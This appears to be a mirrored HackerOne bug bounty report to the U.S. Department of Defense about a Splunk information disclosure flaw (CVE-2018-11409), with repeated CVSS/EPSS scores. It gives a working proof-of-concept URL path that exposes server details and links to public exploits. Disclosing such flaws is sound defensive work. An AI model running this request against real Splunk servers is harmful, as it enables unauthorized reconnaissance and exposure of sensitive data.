Lucene search

K
hackeroneSpell1H1:1860905
HistoryFeb 03, 2023 - 7:36 a.m.

U.S. Dept Of Defense: Splunk Sensitive Information Disclosure @████████

2023-02-0307:36:53
spell1
hackerone.com
141

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.946 High

EPSS

Percentile

99.0%

Hi Team,

Hope you are doing great.
I got a domain that contains Splunk Sensitive Information Disclosure @██████████
PoC:
https://███████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
█████████

Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.

Reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
- https://github.com/kofa2002/splunk
- https://www.exploit-db.com/exploits/44865/
- http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148

Impact

Splunk Sensitive Information Disclosure

System Host(s)

██████

Affected Product(s) and Version(s)

CVE Numbers

Steps to Reproduce

Open this link:
https://█████████/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

Suggested Mitigation/Remediation Actions

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.946 High

EPSS

Percentile

99.0%